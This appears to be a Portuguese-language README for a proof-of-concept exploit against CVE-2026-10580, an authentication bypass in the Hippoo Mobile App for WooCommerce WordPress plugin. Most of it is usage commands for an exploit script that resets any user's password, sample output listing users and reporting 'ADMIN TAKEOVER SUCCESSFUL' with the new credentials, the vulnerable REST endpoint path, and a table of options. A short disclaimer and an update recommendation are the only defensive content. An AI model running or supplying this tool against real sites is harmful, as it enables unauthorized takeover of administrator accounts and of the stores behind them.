
Exploit PoC para CVE-2026-10580 - Bypass de Autenticação no Hippoo Mobile App for WooCommerce <= 1.9.4 levando à tomada de conta de administrador
Esta ferramenta é um exploit de prova de conceito para CVE-2026-10580, uma vulnerabilidade de bypass de autenticação que afeta o Hippoo Mobile App for WooCommerce plugin WordPress (versões <= 1.9.4). A vulnerabilidade permite que atacantes não autenticados redefinam a senha de qualquer utilizador, incluindo administradores, levando à tomada total do site.
⚠️ Importante: Esta ferramenta é apenas para testes de segurança autorizados e fins educacionais. O uso não autorizado contra sistemas que você não possui ou para os quais não tem permissão explícita para testar é ilegal.
requestsInstalar dependências:
pip install requests
python3 exploit.py -t https://target-site.com -p NewPassword123!
Exploit com ID de admin padrão (1) e verificação SSL:
python3 exploit.py -t https://example.com -p PwnedCVE2026!!
Alvejar um ID de utilizador específico e desativar verificação SSL:
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k
Executar sem o banner:
python3 exploit.py -t https://example.com -p NewPass123 --no-banner
[+] Found 3 user(s)
- User ID: 1 | Username: admin | Role: administrator
- User ID: 2 | Username: editor_user | Role: editor
- User ID: 3 | Username: subscriber1 | Role: subscriber
╔══════════════════════════════════════════════════════════════╗
║ ADMIN TAKEOVER SUCCESSFUL ║
╚══════════════════════════════════════════════════════════════╝
Target: https://example.com
Login: https://example.com/wp-admin
Username: admin
Password: PwnedCVE2026!!
Se você está usando o plugin Hippoo, atualize imediatamente para uma versão corrigida (>1.9.4). Adicionalmente:
/wp-json/wc-hippoo/v1/ext/wp/v2/usersEste projeto está licenciado sob a Licença MIT. Consulte o arquivo LICENSE para obter detalhes.
0xgh057r3c0n
O autor não é responsável por qualquer uso indevido desta ferramenta. Use com responsabilidade e apenas em sistemas que você possui ou tem permissão explícita para testar.
| Argumento | Descrição |
|---|
-t, --target | URL do site WordPress alvo (ex.: https://example.com) |
-p, --password | Nova senha para definir na conta de administrador |
-i, --id | ID do utilizador a assumir (padrão: 1) |
-k, --insecure | Ignorar verificação de certificado SSL |
--no-banner | Suprimir o banner ASCII |